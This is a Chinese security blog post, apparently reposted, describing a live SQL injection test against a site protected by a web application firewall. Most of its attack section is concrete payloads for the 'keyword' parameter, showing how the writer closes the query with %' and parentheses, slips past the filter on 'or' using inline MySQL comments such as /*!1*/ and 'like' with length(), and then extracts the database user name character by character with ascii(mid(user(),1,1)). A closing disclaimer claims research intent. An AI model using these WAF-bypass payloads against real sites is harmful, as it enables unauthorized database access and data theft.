文章总结： 文档记录了针对某面板防火墙的SQL注入实战过程，通过手动测试发现单引号触发报错后，尝试多种闭合方式最终利用%号、引号和括号配合注释绕过过滤。关键发现是当or后跟特定字符时被拦截，但通过构造’1’=/!1/条件成功实现布尔注入，进而逐步获取数据库用户长度、ASCII值及库名。可操作建议包括灵活运用注释符和逻辑条件绕过安全机制。 综合评分： 78 文章分类： WEB安全,渗透测试,漏洞分析,实战经验,安全工具

实战SQL注入某面板防火墙绕过

轩公子谈技术

2026年5月8日 18:14 浙江

在小说阅读器读本章

去阅读

以下文章来源于我不懂安全 ，作者Vlan911

我不懂安全 .

分享挖掘漏洞小技巧，分享安全案例以及一些安全动态，分享实用技术

近期的一次SQL注入实战，通过手动测试发现站点存在SQL注入漏洞，首先在探测的时候，输入单引号查看效果

再输入单引号进行闭合

通过报错信息可以直到，想要达到闭合条件最好还是使用%号、引号和括号，尝试闭合配合注释

尝试使用布尔注入的时候，发现被拦截了

但是去掉or后面的字符就不拦截keyword=123%’+or+)–+-

尝试对or使用||、&、等编码转换，都会被拦截，似乎只要or后面跟东西就被拦截，灵机一动，发现可以实现布尔条件，并且数据发生明显变化keyword=123%’+or+’1′)–+-

看似成功，实则拦截keyword=123%’+or+’1’=’1′)–+-

不过并没有什么用，这个时候就比较容易了，一手keyword=123%’+or+’1’=/*!1*/)–+-

尝试条件为假的时候keyword=123%’+or+’1’=/*!2*/)–+-

继续下一步的时候，发现似乎只能输入纯数字，字符串不行、函数也不行

keyword=123%’+or+’1’=/*!length()*/)–+-

keyword=123%’+or+’1’=/*!’1’*/)–+-

这更好绕keyword=123%’+or+’1’+like+/*!length(1)*/)–+-

这个时候再构造个假条件keyword=123%’+or+’1’+like+/*!length(12)*/)–+-

没问题，此时尝试获取数据库当前用户名长度

keyword=123%’+or+’25’+like+/*!length(user())*/)–+-

获取当前数据库用户名第一位对应的ascii值

keyword=123%’+or+’100’+like+/*!ascii(mid(user(),1,1))*/)–+-

第二个字符

以此类推，获得对应的库名

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：轩公子谈技术 《实战SQL注入某面板防火墙绕过》